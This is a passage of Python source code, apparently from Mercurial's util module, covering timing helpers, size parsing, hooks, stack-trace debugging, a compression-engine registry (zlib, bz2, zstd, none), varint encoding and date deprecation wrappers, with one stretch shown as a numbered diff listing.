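# number of digits, e.g.:
#
#   timecount(25)     -> '25.00 s'
#   timecount(0.0042) -> '4.200 ms'
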
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        start = timer()
        indent = 2
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            elapsed = timer() - start
            _timenesting[0] -= indent
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

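# Small usage sketch (hypothetical source names, illustrative only):
#
#   h = hooks()
#   h.add('zzz-ext', lambda x: x * 2)
#   h.add('aaa-ext', lambda x: x + 1)
#   h(3) -> [4, 6]    # 'aaa-ext' sorts before 'zzz-ext'
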
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code, but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code, but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

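# Typical developer usage (illustrative): drop a call into the code path
# being investigated and read the frames from stderr, e.g.
#
#   util.debugstacktrace(b'who calls me?', depth=10)
#
# The function already skips its own frame; depth limits how many of the
# calling frames are shown.
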
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

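# Behavior sketch for the pure-Python implementations above (the C version
# from parsers takes over when available, per the safehasattr check):
#
#   list(finddirs(b'a/b/c')) -> ['a/b', 'a']
#   d = dirs([b'a/b/c', b'a/d'])
#   b'a' in d    -> True   # counted twice, once per path
#   d.delpath(b'a/d')
#   b'a' in d    -> True   # still referenced by 'a/b/c'
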
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle name isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

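# A minimal hypothetical engine, to make the contract above concrete: only
# name() is strictly required, and the streaming methods are needed once the
# engine claims bundle or wire protocol support. This identity engine is a
# sketch, not part of the module (the real 'none' engine below plays this
# role):
#
#   class _identityengine(compressionengine):
#       def name(self):
#           return 'identity'
#       def compressstream(self, it, opts=None):
#           return it
#       def decompressorreader(self, fh):
#           return fh
#
#   compengines.register(_identityengine())
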
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

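# Round-trip sketch for the zlib engine just registered (assuming util's
# stringio alias for an in-memory file object; outputs inferred from the
# code, not from the test suite):
#
#   eng = compengines['zlib']
#   data = b'hello ' * 1000
#   compressed = b''.join(eng.compressstream(iter([data])))
#   eng.decompressorreader(stringio(compressed)).read(len(data)) == data
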
3639 class _bz2engine(compressionengine):
3645 class _bz2engine(compressionengine):
3640 def name(self):
3646 def name(self):
3641 return 'bz2'
3647 return 'bz2'
3642
3648
3643 def bundletype(self):
3649 def bundletype(self):
3644 """An algorithm that produces smaller bundles than ``gzip``.
3650 """An algorithm that produces smaller bundles than ``gzip``.
3645
3651
3646 All Mercurial clients should support this format.
3652 All Mercurial clients should support this format.
3647
3653
3648 This engine will likely produce smaller bundles than ``gzip`` but
3654 This engine will likely produce smaller bundles than ``gzip`` but
3649 will be significantly slower, both during compression and
3655 will be significantly slower, both during compression and
3650 decompression.
3656 decompression.
3651
3657
3652 If available, the ``zstd`` engine can yield similar or better
3658 If available, the ``zstd`` engine can yield similar or better
3653 compression at much higher speeds.
3659 compression at much higher speeds.
3654 """
3660 """
3655 return 'bzip2', 'BZ'
3661 return 'bzip2', 'BZ'
3656
3662
3657 # We declare a protocol name but don't advertise by default because
3663 # We declare a protocol name but don't advertise by default because
3658 # it is slow.
3664 # it is slow.
3659 def wireprotosupport(self):
3665 def wireprotosupport(self):
3660 return compewireprotosupport('bzip2', 0, 0)
3666 return compewireprotosupport('bzip2', 0, 0)
3661
3667
3662 def compressstream(self, it, opts=None):
3668 def compressstream(self, it, opts=None):
3663 opts = opts or {}
3669 opts = opts or {}
3664 z = bz2.BZ2Compressor(opts.get('level', 9))
3670 z = bz2.BZ2Compressor(opts.get('level', 9))
3665 for chunk in it:
3671 for chunk in it:
3666 data = z.compress(chunk)
3672 data = z.compress(chunk)
3667 if data:
3673 if data:
3668 yield data
3674 yield data
3669
3675
3670 yield z.flush()
3676 yield z.flush()
3671
3677
3672 def decompressorreader(self, fh):
3678 def decompressorreader(self, fh):
3673 def gen():
3679 def gen():
3674 d = bz2.BZ2Decompressor()
3680 d = bz2.BZ2Decompressor()
3675 for chunk in filechunkiter(fh):
3681 for chunk in filechunkiter(fh):
3676 yield d.decompress(chunk)
3682 yield d.decompress(chunk)
3677
3683
3678 return chunkbuffer(gen())
3684 return chunkbuffer(gen())
3679
3685
3680 compengines.register(_bz2engine())
3686 compengines.register(_bz2engine())
3681
3687
3682 class _truncatedbz2engine(compressionengine):
3688 class _truncatedbz2engine(compressionengine):
3683 def name(self):
3689 def name(self):
3684 return 'bz2truncated'
3690 return 'bz2truncated'
3685
3691
3686 def bundletype(self):
3692 def bundletype(self):
3687 return None, '_truncatedBZ'
3693 return None, '_truncatedBZ'
3688
3694
3689 # We don't implement compressstream because it is hackily handled elsewhere.
3695 # We don't implement compressstream because it is hackily handled elsewhere.
3690
3696
3691 def decompressorreader(self, fh):
3697 def decompressorreader(self, fh):
3692 def gen():
3698 def gen():
3693 # The input stream doesn't have the 'BZ' header. So add it back.
3699 # The input stream doesn't have the 'BZ' header. So add it back.
3694 d = bz2.BZ2Decompressor()
3700 d = bz2.BZ2Decompressor()
3695 d.decompress('BZ')
3701 d.decompress('BZ')
3696 for chunk in filechunkiter(fh):
3702 for chunk in filechunkiter(fh):
3697 yield d.decompress(chunk)
3703 yield d.decompress(chunk)
3698
3704
3699 return chunkbuffer(gen())
3705 return chunkbuffer(gen())
3700
3706
3701 compengines.register(_truncatedbz2engine())
3707 compengines.register(_truncatedbz2engine())
3702
3708
3703 class _noopengine(compressionengine):
3709 class _noopengine(compressionengine):
3704 def name(self):
3710 def name(self):
3705 return 'none'
3711 return 'none'
3706
3712
3707 def bundletype(self):
3713 def bundletype(self):
3708 """No compression is performed.
3714 """No compression is performed.
3709
3715
3710 Use this compression engine to explicitly disable compression.
3716 Use this compression engine to explicitly disable compression.
3711 """
3717 """
3712 return 'none', 'UN'
3718 return 'none', 'UN'
3713
3719
3714 # Clients always support uncompressed payloads. Servers don't because
3720 # Clients always support uncompressed payloads. Servers don't because
3715 # unless you are on a fast network, uncompressed payloads can easily
3721 # unless you are on a fast network, uncompressed payloads can easily
3716 # saturate your network pipe.
3722 # saturate your network pipe.
3717 def wireprotosupport(self):
3723 def wireprotosupport(self):
3718 return compewireprotosupport('none', 0, 10)
3724 return compewireprotosupport('none', 0, 10)
3719
3725
3720 # We don't implement revlogheader because it is handled specially
3726 # We don't implement revlogheader because it is handled specially
3721 # in the revlog class.
3727 # in the revlog class.
3722
3728
3723 def compressstream(self, it, opts=None):
3729 def compressstream(self, it, opts=None):
3724 return it
3730 return it
3725
3731
3726 def decompressorreader(self, fh):
3732 def decompressorreader(self, fh):
3727 return fh
3733 return fh
3728
3734
3729 class nooprevlogcompressor(object):
3735 class nooprevlogcompressor(object):
3730 def compress(self, data):
3736 def compress(self, data):
3731 return None
3737 return None
3732
3738
3733 def revlogcompressor(self, opts=None):
3739 def revlogcompressor(self, opts=None):
3734 return self.nooprevlogcompressor()
3740 return self.nooprevlogcompressor()
3735
3741
3736 compengines.register(_noopengine())
3742 compengines.register(_noopengine())
class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output.
            # However, it allows decompression to be more optimal since we
            # can pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
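
# Editor's sketch, not part of the original change: typical engine usage,
# falling back to 'none' when the bundled zstd module is unavailable. The
# helper name is hypothetical.
def _zstddemo(data=b'x' * 4096):
    import io
    engine = compengines['zstd']
    if not engine.available():
        engine = compengines['none']
    compressed = b''.join(engine.compressstream(iter([data])))
    reader = engine.decompressorreader(io.BytesIO(compressed))
    assert reader.read(len(data)) == data
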
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()
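
# Editor's note (illustrative, not part of the original change): for the
# 'none' engine above, the generated help item's __doc__ begins roughly
#
#   ``none``
#       No compression is performed.
#
# i.e. the bundle type name followed by the engine's bundletype() docstring.
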
# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
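
# Editor's sketch, not part of the original change: a plain set can stand in
# for both ctx and others, since safename() only needs membership tests. The
# helper name is hypothetical.
def _safenamedemo():
    taken = {'foo~other'}
    # 'foo~other' is taken, so the counting fallback kicks in at ~1.
    assert safename('foo', 'other', taken) == 'foo~other~1'
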
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s
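
# Editor's sketch, not part of the original change: readexactly() either
# returns exactly n bytes or raises Abort, so callers never see short reads.
def _readexactlydemo():
    from io import BytesIO
    assert readexactly(BytesIO(b'abcd'), 4) == b'abcd'
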
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)
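
# Editor's worked example, not part of the original change: 1337 is
# 0b10100111001. The low 7 bits 0111001 (0x39) are emitted first with the
# continuation bit set (0x80 | 0x39 == 0xb9); the remaining value
# 1337 >> 7 == 10 (0x0a, i.e. '\n') is emitted last with the high bit clear.
# Hence uvarintencode(1337) == '\xb9\n', matching the doctest above.
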
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
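
# Editor's sketch, not part of the original change: encode and decode are
# inverses, which is easy to spot-check. The helper name is hypothetical.
def _uvarintroundtripdemo():
    from io import BytesIO
    for value in (0, 1, 127, 128, 1337, 65536):
        assert uvarintdecodestream(BytesIO(uvarintencode(value))) == value
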
###
# Deprecation warnings for util.py splitting
###

defaultdateformats = dateutil.defaultdateformats

extendeddateformats = dateutil.extendeddateformats

def makedate(*args, **kwargs):
    msg = ("'util.makedate' is deprecated, "
           "use 'utils.dateutil.makedate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.makedate(*args, **kwargs)

def datestr(*args, **kwargs):
    msg = ("'util.datestr' is deprecated, "
           "use 'utils.dateutil.datestr'")
    nouideprecwarn(msg, "4.6")
    debugstacktrace()
    return dateutil.datestr(*args, **kwargs)

def shortdate(*args, **kwargs):
    msg = ("'util.shortdate' is deprecated, "
           "use 'utils.dateutil.shortdate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.shortdate(*args, **kwargs)

def parsetimezone(*args, **kwargs):
    msg = ("'util.parsetimezone' is deprecated, "
           "use 'utils.dateutil.parsetimezone'")
    nouideprecwarn(msg, "4.6")
    return dateutil.parsetimezone(*args, **kwargs)

def strdate(*args, **kwargs):
    msg = ("'util.strdate' is deprecated, "
           "use 'utils.dateutil.strdate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.strdate(*args, **kwargs)

def parsedate(*args, **kwargs):
    msg = ("'util.parsedate' is deprecated, "
           "use 'utils.dateutil.parsedate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.parsedate(*args, **kwargs)

def matchdate(*args, **kwargs):
    msg = ("'util.matchdate' is deprecated, "
           "use 'utils.dateutil.matchdate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.matchdate(*args, **kwargs)